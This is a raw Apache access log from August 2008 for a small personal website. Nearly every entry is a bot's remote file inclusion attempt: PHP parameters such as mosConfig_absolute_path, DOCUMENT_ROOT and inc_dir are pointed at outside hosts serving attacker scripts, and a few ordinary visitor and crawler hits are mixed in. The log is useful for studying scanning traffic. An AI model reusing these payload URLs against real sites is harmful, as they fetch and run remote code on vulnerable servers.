74.55.246.194 - - [24/Aug/2008:06:36:52 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.814"
74.55.246.194 - - [24/Aug/2008:06:36:52 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.814"
74.55.246.194 - - [24/Aug/2008:06:37:28 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.814"
74.55.246.194 - - [24/Aug/2008:06:37:28 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.814"
74.200.219.169 - - [24/Aug/2008:06:39:24 -0500] "GET //include.php?path[docroot]=http://h-pro.ru/mvc/inc/inc?? HTTP/1.1" 404 296 "-""libwww-perl/5.814"
65.254.49.34 - - [24/Aug/2008:06:39:27 -0500] "GET /logs/access_log.1206230400//modules/TotalCalendar/about.php?inc_dir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
65.254.49.34 - - [24/Aug/2008:06:39:27 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.810"
65.254.49.34 - - [24/Aug/2008:06:39:27 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.19.90.90 - - [24/Aug/2008:06:41:05 -0500] "GET /logs/login.php?dir=http://www.marioni.info/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
67.19.90.90 - - [24/Aug/2008:06:41:05 -0500] "GET /login.php?dir=http://www.marioni.info/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
86.57.255.65 - - [24/Aug/2008:06:41:37 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tendiko.hr/galerija/tendiko/id.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
86.57.255.65 - - [24/Aug/2008:06:41:37 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tendiko.hr/galerija/tendiko/id.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
86.57.255.65 - - [24/Aug/2008:06:41:37 -0500] "GET /logs/access_log.1216598400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tendiko.hr/galerija/tendiko/id.txt???? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
67.19.90.90 - - [24/Aug/2008:06:41:39 -0500] "GET /logs/access_log.1201564800/login.php?dir=http://www.marioni.info/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
67.19.90.90 - - [24/Aug/2008:06:41:39 -0500] "GET /login.php?dir=http://www.marioni.info/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
67.19.90.90 - - [24/Aug/2008:06:41:39 -0500] "GET /logs/login.php?dir=http://www.marioni.info/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
209.217.116.153 - - [24/Aug/2008:06:41:48 -0500] "GET /logs/login.php?dir=http://www.marioni.info/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
209.217.116.153 - - [24/Aug/2008:06:41:48 -0500] "GET /login.php?dir=http://www.marioni.info/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
67.19.90.90 - - [24/Aug/2008:06:41:50 -0500] "GET /logs/access_log.1206230400/login.php?dir=http://www.marioni.info/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
209.217.116.153 - - [24/Aug/2008:06:42:31 -0500] "GET /logs/access_log.1201564800/login.php?dir=http://www.marioni.info/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
209.217.116.153 - - [24/Aug/2008:06:42:33 -0500] "GET /login.php?dir=http://www.marioni.info/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
209.217.116.153 - - [24/Aug/2008:06:42:33 -0500] "GET /logs/login.php?dir=http://www.marioni.info/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
216.55.159.47 - - [24/Aug/2008:06:42:39 -0500] "GET /logs//?sIncPath=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt? HTTP/1.1" 200 96475 "-""libwww-perl/5.803"
216.55.159.47 - - [24/Aug/2008:06:42:40 -0500] "GET //?sIncPath=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
209.217.116.153 - - [24/Aug/2008:06:42:47 -0500] "GET /logs/access_log.1206230400/login.php?dir=http://www.marioni.info/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
67.15.80.42 - - [24/Aug/2008:06:43:11 -0500] "GET /logs//include/admin.lib.inc.php?site_path=%20http://h1.ripway.com/noutz/aa.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
67.15.80.42 - - [24/Aug/2008:06:43:30 -0500] "GET //include/admin.lib.inc.php?site_path=%20http://h1.ripway.com/noutz/aa.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
77.221.130.3 - - [24/Aug/2008:06:43:35 -0500] "GET /logs/access_log.1206230400//modules/My_eGallery/public/displayCategory.php?basepath=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 358 "-""libwww-perl/5.803"
77.221.130.3 - - [24/Aug/2008:06:43:35 -0500] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
77.221.130.3 - - [24/Aug/2008:06:43:36 -0500] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
77.221.130.3 - - [24/Aug/2008:06:43:38 -0500] "GET /logs/access_log.1206230400//modules/My_eGallery/public/displayCategory.php?basepath=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 358 "-""libwww-perl/5.803"
77.221.130.3 - - [24/Aug/2008:06:43:38 -0500] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
77.221.130.3 - - [24/Aug/2008:06:43:38 -0500] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
67.19.90.90 - - [24/Aug/2008:06:43:47 -0500] "GET /logs/login.php?dir=http://www.marioni.info/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
67.19.90.90 - - [24/Aug/2008:06:43:47 -0500] "GET /login.php?dir=http://www.marioni.info/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
69.93.234.108 - - [24/Aug/2008:06:44:21 -0500] "GET /logs/access_log.1206230400/signin.php?sent=1&AMG_serverpath=http://www.wichtl.at/files/echo? HTTP/1.1" 404 321 "-""libwww-perl/5.800"
69.93.234.108 - - [24/Aug/2008:06:44:22 -0500] "GET /logs/signin.php?sent=1&AMG_serverpath=http://www.wichtl.at/files/echo? HTTP/1.1" 404 299 "-""libwww-perl/5.800"
209.217.116.153 - - [24/Aug/2008:06:44:56 -0500] "GET /logs/login.php?dir=http://www.marioni.info/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
209.217.116.153 - - [24/Aug/2008:06:44:56 -0500] "GET /login.php?dir=http://www.marioni.info/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
210.116.103.35 - - [24/Aug/2008:06:45:49 -0500] "GET /logs/access_log.1208044800/index.php?AML_opensite=http://www.wichtl.at/files/echo? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
210.116.103.35 - - [24/Aug/2008:06:45:50 -0500] "GET /logs/index.php?AML_opensite=http://www.wichtl.at/files/echo? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
74.200.219.169 - - [24/Aug/2008:06:47:20 -0500] "GET /logs/access_log.1213488000/index.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://h-pro.ru/mvc/inc/inc?? HTTP/1.1" 404 320 "-""libwww-perl/5.814"
74.200.219.169 - - [24/Aug/2008:06:47:20 -0500] "GET /index.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://h-pro.ru/mvc/inc/inc?? HTTP/1.1" 404 293 "-""libwww-perl/5.814"
74.200.219.169 - - [24/Aug/2008:06:47:20 -0500] "GET /logs/index.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://h-pro.ru/mvc/inc/inc?? HTTP/1.1" 404 298 "-""libwww-perl/5.814"
190.0.195.242 - - [24/Aug/2008:06:47:48 -0500] "GET /logs/access_log.1209600000//include.php?path[docroot]=http://h-pro.ru/mvc/inc/inc?? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
190.0.195.242 - - [24/Aug/2008:06:47:51 -0500] "GET //include.php?path[docroot]=http://h-pro.ru/mvc/inc/inc?? HTTP/1.1" 404 296 "-""libwww-perl/5.79"
190.0.195.242 - - [24/Aug/2008:06:47:52 -0500] "GET /logs//include.php?path[docroot]=http://h-pro.ru/mvc/inc/inc?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
72.5.54.215 - - [24/Aug/2008:06:49:04 -0500] "GET /logs/access_log.1206230400//modules/TotalCalendar/about.php?inc_dir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
72.5.54.215 - - [24/Aug/2008:06:49:04 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.65"
72.5.54.215 - - [24/Aug/2008:06:49:04 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
72.5.54.215 - - [24/Aug/2008:06:49:14 -0500] "GET /logs/access_log.1206230400//modules/TotalCalendar/about.php?inc_dir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
72.5.54.215 - - [24/Aug/2008:06:49:14 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.65"
72.5.54.215 - - [24/Aug/2008:06:49:14 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
72.5.54.215 - - [24/Aug/2008:06:49:35 -0500] "GET /logs/access_log.1206230400//modules/TotalCalendar/about.php?inc_dir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
72.5.54.215 - - [24/Aug/2008:06:49:35 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.65"
72.5.54.215 - - [24/Aug/2008:06:49:36 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.brzina.net//templates/Za/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
216.193.201.56 - - [24/Aug/2008:06:50:16 -0500] "GET /comments.php?AMG_serverpath=http://www.wichtl.at/files/echo? HTTP/1.1" 404 296 "-""libwww-perl/5.76"
219.117.239.114 - - [24/Aug/2008:06:50:55 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.zyssetd.ch/.../test.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.65"
219.117.239.114 - - [24/Aug/2008:06:50:56 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.zyssetd.ch/.../test.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.65"
74.6.8.121 - - [24/Aug/2008:06:51:33 -0500] "GET /logs/access_log.1216598400 HTTP/1.0" 200 749270 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
217.172.186.250 - - [24/Aug/2008:06:52:02 -0500] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
217.172.186.250 - - [24/Aug/2008:06:52:02 -0500] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
67.202.88.42 - - [24/Aug/2008:06:52:17 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.topyn.com/ips.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
67.202.88.42 - - [24/Aug/2008:06:52:17 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.topyn.com/ips.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
80.247.64.150 - - [24/Aug/2008:06:53:01 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://peru.americautos.com/test.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
80.247.64.150 - - [24/Aug/2008:06:53:08 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://peru.americautos.com/test.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
86.58.154.237 - - [24/Aug/2008:06:53:08 -0500] "GET /logs/access_log.1214438400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
86.58.154.237 - - [24/Aug/2008:06:53:08 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
86.58.154.237 - - [24/Aug/2008:06:53:09 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
67.15.80.42 - - [24/Aug/2008:06:54:26 -0500] "GET /logs/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=%20http://h1.ripway.com/noutz/aa.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.810"
67.15.80.42 - - [24/Aug/2008:06:54:26 -0500] "GET /src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=%20http://h1.ripway.com/noutz/aa.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.810"
74.6.8.121 - - [24/Aug/2008:06:55:05 -0500] "GET /logs/access_log.1205280000 HTTP/1.0" 200 427922 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.200.219.169 - - [24/Aug/2008:06:55:11 -0500] "GET /logs/access_log.1203724800//include.php?path[docroot]=http://h-pro.ru/mvc/inc/inc?? HTTP/1.1" 404 323 "-""libwww-perl/5.814"
79.69.165.227 - - [24/Aug/2008:06:55:32 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 304 - "http://www.google.co.uk/search?gbv=2&hl=en&safe=off&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=vintage+tattoo+flash&spell=1""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322)"
79.69.165.227 - - [24/Aug/2008:06:55:32 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322)"
79.69.165.227 - - [24/Aug/2008:06:55:32 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322)"
67.202.88.42 - - [24/Aug/2008:06:55:46 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.topyn.com/ips.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
67.202.88.42 - - [24/Aug/2008:06:55:46 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.topyn.com/ips.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
74.6.8.121 - - [24/Aug/2008:06:56:26 -0500] "GET /logs/access_log.1204329600 HTTP/1.0" 200 256294 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
216.75.56.186 - - [24/Aug/2008:06:58:11 -0500] "GET /logs//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://suport08.freehostia.com/echo.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.803"
216.75.56.186 - - [24/Aug/2008:06:58:11 -0500] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://suport08.freehostia.com/echo.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
74.200.219.169 - - [24/Aug/2008:06:58:12 -0500] "GET /logs/access_log.1213488000/index.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://h-pro.ru/mvc/inc/inc?? HTTP/1.1" 404 320 "-""libwww-perl/5.814"
74.200.219.169 - - [24/Aug/2008:06:58:12 -0500] "GET /index.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://h-pro.ru/mvc/inc/inc?? HTTP/1.1" 404 293 "-""libwww-perl/5.814"
74.200.219.169 - - [24/Aug/2008:06:58:12 -0500] "GET /logs/index.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://h-pro.ru/mvc/inc/inc?? HTTP/1.1" 404 298 "-""libwww-perl/5.814"
72.52.244.232 - - [24/Aug/2008:06:58:16 -0500] "GET /logs/access_log.1214438400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.810"
72.52.244.232 - - [24/Aug/2008:06:58:16 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
72.52.244.232 - - [24/Aug/2008:06:58:16 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
72.52.244.232 - - [24/Aug/2008:06:58:30 -0500] "GET /logs/access_log.1214438400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.810"
72.52.244.232 - - [24/Aug/2008:06:58:30 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
72.52.244.232 - - [24/Aug/2008:06:58:30 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
72.52.244.232 - - [24/Aug/2008:07:00:09 -0500] "GET /logs/access_log.1214438400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.810"
72.52.244.232 - - [24/Aug/2008:07:00:09 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
72.52.244.232 - - [24/Aug/2008:07:00:09 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
69.94.70.15 - - [24/Aug/2008:07:00:41 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.65"
69.94.70.15 - - [24/Aug/2008:07:00:41 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.65"
74.200.219.169 - - [24/Aug/2008:07:01:47 -0500] "GET /logs/access_log.1214524800//include.php?path[docroot]=http://h-pro.ru/mvc/inc/inc?? HTTP/1.1" 404 323 "-""libwww-perl/5.814"
62.65.159.210 - - [24/Aug/2008:07:02:30 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.76"
62.65.159.210 - - [24/Aug/2008:07:02:30 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.76"
65.254.58.42 - - [24/Aug/2008:07:03:47 -0500] "GET /logs/access_log.1214438400%22%20%20lang=%22de%22%3ETomdolan.pconline.com%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/66.218.71.231/language/translation/translatedPage.php?tt=url&text=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1214438400&lp=de_en&.intl=us&fr=sfp%22%20target=%22_blank%22%3ETranslate%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22de%22%3E...%2016:06%20-0500]%20%22GET%20/logs/phphtml.php?htmlclass_path=http:/alaskafamily.net/poll/me.txt?%20...%2046%20-0500]%20%22GET%20/phphtml.php?htmlclass_path=http:/189.20.64.27%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1214438400%3C/span%3E%20-%20%3Cem%3E525k%3C/em%3E%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0geu6GCx69Ib1EA49NXNyoA;_ylu=X3oDMTB0aW4zb3U4BHNlYwNzcgRwb3MDODMzBGNvbG8DYWMyBHZ0aWQD/SIG=11md6engt/EXP=1219565826/**http%3a/www.minescraper.com/recent/phphtml.php?htmlclass_path=http://www.all-cs.ru/sistem.gif? HTTP/1.1" 404 442 "-""libwww-perl/5.811"
65.254.58.42 - - [24/Aug/2008:07:03:47 -0500] "GET /phphtml.php?htmlclass_path=http://www.all-cs.ru/sistem.gif? HTTP/1.1" 404 295 "-""libwww-perl/5.811"
80.247.64.150 - - [24/Aug/2008:07:03:52 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://alboz.l4rge.com/pw.txt? HTTP/1.1" 404 330 "-""libwww-perl/5.808"
80.247.64.150 - - [24/Aug/2008:07:03:52 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://alboz.l4rge.com/pw.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.808"
65.254.58.42 - - [24/Aug/2008:07:04:13 -0500] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.all-cs.ru/sistem.gif? HTTP/1.1" 404 314 "-""libwww-perl/5.811"
65.254.58.42 - - [24/Aug/2008:07:04:14 -0500] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.all-cs.ru/sistem.gif? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
65.254.58.42 - - [24/Aug/2008:07:04:16 -0500] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.all-cs.ru/sistem.gif? HTTP/1.1" 404 314 "-""libwww-perl/5.811"
65.254.58.42 - - [24/Aug/2008:07:04:16 -0500] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.all-cs.ru/sistem.gif? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
151.64.167.56 - - [24/Aug/2008:07:05:06 -0500] "GET /logs/access_log.1210291200//modules/cjaycontent/admin/editor2/errors.php?error=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 356 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
217.172.186.250 - - [24/Aug/2008:07:06:05 -0500] "GET /logs/access_log.1214179200/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
217.172.186.250 - - [24/Aug/2008:07:06:05 -0500] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
217.172.186.250 - - [24/Aug/2008:07:06:05 -0500] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
80.248.180.182 - - [24/Aug/2008:07:06:20 -0500] "GET /logs//errors.php?error=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
80.248.180.182 - - [24/Aug/2008:07:06:21 -0500] "GET //errors.php?error=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
151.64.167.56 - - [24/Aug/2008:07:06:31 -0500] "GET /logs/access_log.1207958400//modules/cjaycontent/admin/editor2/errors.php?error=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 356 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
80.248.180.182 - - [24/Aug/2008:07:06:51 -0500] "GET /logs//errors.php?error=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
80.248.180.182 - - [24/Aug/2008:07:06:51 -0500] "GET //errors.php?error=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
67.202.88.42 - - [24/Aug/2008:07:07:25 -0500] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.topyn.com/ips.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
67.202.88.42 - - [24/Aug/2008:07:07:25 -0500] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.topyn.com/ips.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
80.248.180.182 - - [24/Aug/2008:07:08:23 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://wvrn.cc/help/ids.txt? HTTP/1.1" 404 361 "-""libwww-perl/5.79"
80.248.180.182 - - [24/Aug/2008:07:08:23 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://wvrn.cc/help/ids.txt? HTTP/1.1" 404 356 "-""libwww-perl/5.79"
151.64.167.56 - - [24/Aug/2008:07:08:28 -0500] "GET /logs/access_log.1211673600//modules/cjaycontent/admin/editor2/errors.php?error=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 356 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
151.64.167.56 - - [24/Aug/2008:07:08:34 -0500] "GET /logs/access_log.1211932800//modules/cjaycontent/admin/editor2/errors.php?error=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 356 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
151.64.167.56 - - [24/Aug/2008:07:08:53 -0500] "GET /logs/access_log.1214179200//modules/cjaycontent/admin/editor2/errors.php?error=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 356 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
151.64.167.56 - - [24/Aug/2008:07:09:14 -0500] "GET /logs/access_log.1207872000//modules/cjaycontent/admin/editor2/errors.php?error=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 356 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
151.64.167.56 - - [24/Aug/2008:07:09:15 -0500] "GET /logs/access_log.1213401600//modules/cjaycontent/admin/editor2/errors.php?error=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 356 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
151.64.167.56 - - [24/Aug/2008:07:09:19 -0500] "GET /logs/access_log.1207440000//modules/cjaycontent/admin/editor2/errors.php?error=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 356 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
